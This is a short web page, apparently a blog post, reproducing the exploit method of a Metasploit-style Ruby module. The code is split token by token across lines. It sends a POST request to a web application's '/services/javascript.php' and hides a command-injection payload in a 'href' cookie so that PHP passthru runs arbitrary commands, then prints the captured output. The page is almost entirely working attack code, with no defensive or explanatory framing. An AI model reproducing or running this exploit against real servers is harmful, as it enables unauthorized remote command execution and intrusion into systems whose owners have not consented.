def
exploit
uri = datastore[
'URI'
]
if
uri[
0
,
1
] !=
'/'
uri =
'/'
+ uri
end
if
uri[-
1
,
1
] ==
'/'
uri = uri[
0
, uri.length-
1
]
end
function =
"passthru"
key = Rex::Text.rand_text_alpha(
6
)
arguments =
"echo #{key}`"
+payload.raw+
"`#{key}"
res = send_request_cgi({
'uri'
=> uri +
"/services/javascript.php"
,
'method'
=>
'POST'
,
'ctype'
=>
'application/x-www-form-urlencoded'
,
'data'
=>
"app="
+datastore[
'APP'
]+
"&file=open_calendar.js"
,
'headers'
=>
{
'Cookie'
=>
"href="
+function+
":"
+arguments,
'Connection'
=>
'Close'
,
}
})
if
(res)
print_status(
"The server returned: #{res.code} #{res.message}"
)
end
resp = res.body.split(key)
if
resp
and
resp[
1
]
print_status(resp[
1
])
else
print_error(
"No response found"
)
end
handler
end
No comments:
Post a Comment